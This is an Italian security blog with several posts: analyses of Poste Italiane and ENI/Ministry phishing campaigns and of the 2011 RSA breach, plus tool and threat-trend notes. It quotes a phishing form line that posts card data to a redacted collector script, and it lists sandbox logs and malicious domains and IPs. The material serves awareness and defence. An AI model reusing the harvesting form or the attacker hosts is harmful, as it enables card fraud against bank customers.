Il taccuino di Armando Leotta Rotating Header Image

phishing

Vogliamo guardare in faccia questo #phishing? Ancora #poste

Ancora una volta gli utenti di Poste Italiane sono le vittime di un attacco di phishing.

Una mail, una delle tante che arrivano e che non sono state rilevate dai sistemi di sicurezza?

Non propriamente “una delle tante”.

Guardiamola insieme: ecco come si presenta:

NOTA: tutti i link puntano a poste.it

NOTA: tutti i link puntano a poste.it (cliccare per ingrandire)

Perchè è “ben fatta”? Perchè tutti i link puntano al sito ufficiale di poste.it.

Ripeto per i lettori frettolosi.

Tutti i link puntano a poste.it: il login in alto a destra, il registrati, i banner in basso sia a sinistra che a destra.

Tutti.

Cosa non torna?

Per accedere ai servizi online nessuno si sognerebbe di chiedere i dati di carta di credito al completo (fullz, ndr)!

E’ il caso di controllare il sorgente di questo simpatico htm.

Bingo!

Vedete quel familiarissimo tasto “Accedi”?

_______<stralcio>____

Accedi ai Servizi Online </strong></p>

<form name=”loginform1″ method=”POST” onsubmit=”javascript: return logintest(this);” action=”http://www.XXXXXXXXXX.com/.XXXXXXXX/done.php“>

_______</stralcio>____

Che meravigliosa action!

Pertanto, chi inserisce le credenziali (leggasi i propri dati completi della carta di credito postepay / bancoposta comprensivo di cvv) per “accedere” ai servizi contatta tramite l’azione quel done.php.

Bene.

Verifichiamo cosa fa questo delizioso quanto inaspettato php.

Innanzitutto notiamo se c’è dell’altro sul sito per capire anche la dimensione del fenomeno.

Qui l’attaccante, per probabile dimenticanza o per poter usare la funzionalità con qualche bot, lascia la cartella XXXXXXXX con i permessi per il listing.

Quello che trovo è decisamente un arsenale di tool di attacchi e di spam. Il tutto sfruttabile via web sfruttando le risorse del malcapitato owner del sito web opportunamente bucato.

E non solo.

Trovo un file che non vorrei avere mai trovato.

Tornando sulla pagina incriminata,  scrivendo dei dati finti nella form e completando l’operazione cliccando su “Accedi” si ha l’ennesima triste evidenza: sul server XXXXXX un file è stato appena modificato.

E’ un innocente file di testo che contiene i dati delle carte di credito di tutti gli ignari ed ingenui malcapitati clienti di Postepay/Bancoposta, comprensi quelli fittizi appena inseriti come test.

Ovviamente ho rimosso il nome reale del sito in quanto è ancora raggiungibile.

Mentre vi scrivo ho già effettuato la segnalazione sul sito della Polizia di Stato.

Brutta storia.

Spero serva a riflettere.

#awareness is the key.

_____
Clusit

[Phishing] Attenzione alla nuova mail (apparentemente) a firma ENI & Ministero dello sviluppo economico #phishing #security

Phishing Eni e Sviluppo Economico

Phishing Eni e Sviluppo Economico

Il periodo non è certo dei migliori.

La mail con oggetto “Richiedi la carta benzine con lo socnto di 400 euro” presenta diversi elementi interessanti.

In primo luogo, è evidente la componente di social engineering: logo del Ministero dello Sviluppo Economico, Partita IVA dello Sviluppo Economico nel footer della mail (come sapete è un’informazione obbligatoria e si trova facilmente sul vero sito del Ministero), riferimento ad un nuovo DECRETO LEGGE.

Inoltre, si fa meschinamente leva sulla possibilità di acquistare una carta carburante a prezzi incredibilmente vantaggiosi:

“Agip gruppo Eni ti consente di acquistare la carta carburante di 500 Euro al prezzo di 100 Euro (80% rimborsato dal Ministero dello Sviluppo Economico).”

In secondo luogo, aldilà della credibilità o meno dell’iniziativa, spunta la componente di phishing: il link suggerito per approfondire le informazioni sembrerebbe quello del Ministero dello Sviluppo Economico ma punta all’indirizzo sviluppoeconomico.myvnc.com.

Il dominio myvnc.com è un dominio gestito da servizi di dns dinamico (no-ip.com).

Indirizzo reale a cui punta

Indirizzo reale a cui punta

Per gli addetti ai lavori, raggiungendo tramite sandbox (anubis) quell’indirizzo, ecco qualche dettaglio in più (tralascio le svariate chiavi del registry lette E modificate).

DNS Queries:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Name: [ ministerodellosviluppoeconomico.myvnc.com ], Query Type: [ DNS_TYPE_A ],
            Query Result: [ 8.23.224.90 ], Successful: [ YES ], Protocol: [ udp ]
        Name: [ www.grutuitapostecom.com ], Query Type: [ DNS_TYPE_A ],
            Query Result: [ 66.147.241.45 ], Successful: [ YES ], Protocol: [ udp ]
HTTP Conversations:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        From ANUBIS:1029 to 8.23.224.90:80 - [ ministerodellosviluppoeconomico.myvnc.com ]
             Request: [ GET / ], Response: [ 200 "Found" ]
        From ANUBIS:1030 to 66.147.241.45:80 - [ www.grutuitapostecom.com ]
             Request: [ GET /Agip/travel.eni.com/iveportal/cards/W155.PKG_RICONLINE.show_pageNL22.php ], Response: [ 200 "OK" ]
             Request: [ GET /Agip/travel.eni.com/iveportal/cards/W155.PKG_RICONLINE.show_pageNL2_files/offerta.css ], Response: [ 404 "Not Found" ]

 

In ultima analisi e considerazione, a giudicare da qualche errore riscontrato, il meccanismo non sembra (ancora) del tutto a punto ma, attenzione, quella risorsa .php esiste e viene correttamente raggiunta dal client.
Da come è scritta e dalle risorse chiamate in causa sembrerebbe di matrice italiana.

In ogni caso, non dimenticate le regole d’oro:

1) non cliccate sui link che vi giungono via mail ma verificate prima qual è la reale destinazione degli stessi.
2) aggiornate sempre i vostri sistemi (sia il sistema operativo che le componenti off-the-shelf come java e prodotti adobe integrati con il browser – plugin flash, acrobat, etc).
3) se avete raggiunto quel link effettuate una scansione totale del vostro dispositivo con un tool antivirus/antimalware aggiornato.

****************** UPDATE 1/6/13 ***************************

Ne stanno girando altre versioni con il testo leggermente più curato e credibile.

Stessa struttura, stesso ddns proviver (No-IP.com) questa volta con servebeer.com (ministeroeconomico.servebeer.com).

Questa volta non si appoggia a grutuitapostecom.com ma a un sito gratuito su altervista (mnsit.altervista.org).

Iseclab security tool: anubis, wepawet & andrubis

Per gli addetti ai lavori sono tool noti.

In ogni caso segnalo dei tool della International Secure System Lab

Anubis: Analyzing Unknown BinariesParticolarmente attivi ed interessanti Anubis e Wepawet.

Anubis (ANalyze Unknown BInarieS)

Inizialmente era nato come servizio di analisi malware e permetteva di sottomettere esclusivamente eseguibili windows sospetti.

Di recente è stato integrato Andrubis che integra la scansione di APK Android.

E’ possibile anche sottomettere un URL per verificare il comportamento del browser alla ricerca di un drive-by-download attack o similari.

Ottima la reportistica e la profondità di dettagli.

Wepawet

Se invece avete a che fare con un pdf, un javascript o un file flash sospetto potete usare il servizio wepawet.

I sistemi utilizzano un’opportuna sandbox nella quale lanciano il contenuto inviato  che viene tracciato ed analizzato.

Nota: date un’occhiata anche al servizio Exposure.

E’ un servizio web che rileva i domini coinvolti in attività legate a diffusione di codice malevolo: è ancora in beta ma promette decisamente bene.

Tendenze e previsioni per il 2012: top cyber threats

Gli ultimi mesi hanno visto una netta recrudescenza del fenomeno del cosiddetto cybercrime.

Information securityIn particolare, le grandi strutture ed infrastrutture, pubbliche, private o critiche hanno rilevato un aumento degli attacchi alle proprie risorse informative sia in termini di numero di incidenti che di complessità e potenziale impatto degli attacchi posti in essere.

Alcuni studi di settore (a titolo d’esempio 2012 McAfee threats predictions e IBM X-Force threats report), delineano un 2012 particolarmente delicato dal punto di vista dell’ ICT Security.

Da questi report emergono previsioni di altri attacchi mirati su infrastrutture critiche (targeted attack) ed una grande attenzione e preoccupazione per il cosiddetto hacktivism, un attivismo e co-partecipazione in rete che sfocia di sovente, più o meno consapevolmente,  in attività illegali contro siti istituzionali.

Se da una parte, ad esempio, si registra una diminuizione dello spam, dall’altra si sta assistendo ad una vera e propria legalizzazione dello spam tramite l’acquisto di liste di indirizzi/utenti  che hanno effettivamente dato il loro assenso alla ricezione di pubblicità ad altre società a volte ormai fuori dal mercato.

Particolarmente alta l’attenzione per i dispositivi mobili: dalle botnet mobile ai mobile banking attack.

Il 2011 ha segnato quote record per il malware a danno dei dispositivi mobili.

Ricordo che, oltre ad essere una raccolta inestimabile d’informazioni personali,  e-wallet e  homebanking,  i nostri dispositivi mobili evoluti dispongono di funzionalità di geolocalizzazione spesso attive di default e/o non documentate.

Credo sia inutile evidenziare come queste informazioni siano particolarmente appetibili e pericolose se nelle mani sbagliate.

Come sempre, mai allarmismo ma nemmeno ignorare le problematiche: consapevolezza innanzitutto.

Consiglio pertanto di approfondire i due report segnalati sopra ed una mia riflessione in merito al location sharing & privacy, sempre più attuale.

Attacco RSA: dettagli e riflessioni – How RSA was breached –

Tutti si ricorderanno dell’attacco (“extremely sophisticated cyberattack“) subito dal colosso RSA lo scorso marzo (qui la lettera aperta ai propri clienti da parte RSA).

Tutto faceva supporre che eravamo di fronte ad un nuovo APT, un advanced persistent threat ai danni della società che fa della sicurezza il proprio core business con organizzazioni, agenzie governative ed istituzioni di tutto il mondo.

Un APT attack che si conclude sfruttando uno zero-day exploit relativo ad una vulnerabilità di Adobe Flash.

The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file. It was a spreadsheet titled “2011 Recruitment plan.xls.(*)

(*) Anatomy of an attack, RSA blog

In un primo momento l’allarme sembrava essere rientrato e che nessuno dei clienti RSA era a rischio.

Dopo qualche mese (fine maggio)  la Lockheed Martin (U.S. Defence contractor) denunciava il tentativo di intromissione ai propri sistemi tramite l’utilizzo di chiavi duplicate generate dal SecurID RSA.

Dopo qualche giorno, è la volta di un altro gigante della difesa americana. Ecco quanto si legge su wired:

“L-3 Communications has been actively targeted with penetration attacks leveraging the compromised information,” read an April 6 e-mail from an executive at L-3’s Stratus Group to the group’s 5,000 workers, one of whom shared the contents with Wired.com on condition of anonymity.

Dopo qualche giorno anche la Northrop Grumman disabilita l’accesso remoto senza preavviso lasciando trasparire un ennesimo caso di intrusione.

A questo punto, con una seconda lettera aperta, RSA ammette la compromissione ed il furto di informazioni riservate (e l’utilizzo delle informazioni carpite nell’attacco alla Lockheed, ndr)

“Against this backdrop of increasingly frequent attacks, on Thursday, June 2, 2011, we were able to confirm that information taken from RSA in March had been used as an element of an attempted broader attack on Lockheed Martin, a major U.S. government defense contractor. Lockheed Martin has stated that this attack was thwarted.”

e l’imminente sostituzione dei token SecurID emessi.

Fino a qui, specialmente per gli addetti ai lavori, è solo un riepilogo, spero gradito, di una vicenda molto grave sulla quale si è detto relativamente poco:

un APT attack, un “extremely sophisticated attack” che si conclude sfruttando uno zero-day exploit relativo ad una vulnerabilità di Adobe Flash.

Manca un capitolo: sappiamo che, lato client, tutto è partito da una mail…

“The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file. It was a spreadsheet titled “2011 Recruitment plan.xls.”(*)

(*) Anatomy of an attack, RSA blog

Purtroppo non sono stati forniti da RSA ulteriori dettagli su questa “crafted well enough” email.

Alla F-Secure sono riusciti a risalire alla mail ed al file incriminato. Come?

Evidentemente qualcuno alla EMC, la divisione di RSA oggetto dell’attacco, ha voluto effettuare una scansione online del malware effettuando un upload dello stesso verso VirtusTotal, un online virus scanning site.

Come specificato nelle condizioni d’uso di VirusTotal il file è stato condiviso con le industrie del settore per approfondire e condividere la conoscenza di un potenziale nuovo malware.

Dunque quanto ha tenuto in apprensione RSA ed i suoi clienti era in possesso dei maggiori vendor di sicurezza informatica benché a loro insaputa.

Ecco quanto ricostruisce F-Secure:

Upload effettuato il 19 marzo come file-1994209_msg
Upload effettuato il 19 marzo come file-1994209_msg

Ed ecco come appare la well enough crafted email:

2011 recruitment plan
2011 recruitment plan

La mail è stata oggetto di spoofing e sembra inviata dal sito di recruiting beyond.com ed è stata inviata ad un impiegato/utente @emc.com ed in copia altri tre indirizzi analoghi.

Aprendo l’allegato:

Allegato xls incriminato
Allegato xls incriminato

Quella checkbox visibile è un embedded flash object che sfrutta quella che era una vulnerabilità non ancora sanata (per quale motivo excel supporti tali oggetti embedded merita tutta un’altra discussione, ndr).

L’oggetto flash usa la CVE-2011-0609 per eseguire del codice malevolo ed installa quella che si scoprirà essere identificata come Poisin Ivy backdoor. Al termine dell’infezione, il codice chiude excel mentre la Poison contatta il suo server

su good.mincesur.com (il dominio mincesur.com è stato già usato per attacchi simili, ndr).

mincesur.com
mincesur.com

Qui un video di cosa succede all’apertura del file xls incriminato:

Riflessioni

La mail, a metà strada tra il phishing e lo scamming, fa chiaramente uso di ingegneria sociale ma non mi sembra si possa considerare well enogh crafted email nè un extremely sophisticated attack.

Sebbene la vulnerabilità sfruttata era una zero-day (quindi non esisteva, in quel periodo, un’apposita patch) risulta poco accettabile e sostenibile che in colossi che fanno della sicurezza altrui il proprio core business non implementino soluzioni parallele infrastrutturali ed applicative a supporto di casi del genere.

Cos’è sofisticato?

Sicuramente lo è l’exploit per sfruttare la vulnerabilità flash ed innoculare la backdoor. Quest’ultima, per altro, non era tra le più sofisticate.

 Il target, sicuramente: andare a procurarsi i codici direttamente alla fonte per poi attaccare la Lockheed Martin, ad esempio, è molto sofisticato, ambizioso e preoccupante.

La componente APT?

Una volta effettuata la connessione l’attaccante ha accesso remoto completo non solo alla postazione target ma a tutte le risorse aziendali condivise a cui l’impiegato target (le sue credenziali, ndr) avevano accesso (dischi remoti, server intermedi, sistemi documentali, collaboration, etc…).

Non stupirebbe pertanto che gli attaccanti possano avere usato e monitorato per diverso tempo le attività del target fino all’ottenimento dell’accesso ai dati SecurID cercati.

Conclusioni

Non è accettabile che una zero-day possa compromettere strutture di questo livello così come non è pensabile di basare la propria sicurezza su sistemi sempre up-to-date (è praticamente impossibile).

Nello specifico sembra assurdo ma anche in questo caso l’anello debole si colloca tra il monitor e la spalliera della sedia.

_____
Clusit